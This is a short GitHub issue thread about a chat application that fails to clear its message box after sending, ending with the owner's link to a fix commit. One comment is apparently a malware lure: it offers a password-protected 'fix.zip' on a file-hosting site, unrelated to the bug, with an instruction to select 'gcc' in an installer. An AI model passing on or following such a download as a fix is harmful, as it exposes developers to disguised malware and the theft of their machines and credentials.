### ISSUE TITLE
[BUG][FRONTEND] Chatting: Application is not clearing text box after sending message

### ISSUE THREAD

**Issue by Oguzoz1** [Oguzoz1/ChatApp#2]
Chat application UI is not clearing sending-message text box after sending message to the chat room. User must delete the message by itself to write a new message.

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Oguzoz1** [comment]
[Fix Commit](https://github.com/Oguzoz1/ChatApp/commit/7b8db86cf1def7061a172e60fe50264b08d5c044) has fixed the problem. Problem has been fixed through manually calling property event handler, and binding the event invoking within properties. 
![image](https://github.com/user-attachments/assets/7b0602f1-bc44-4bc8-9cbd-f9d1f3ba6b55)
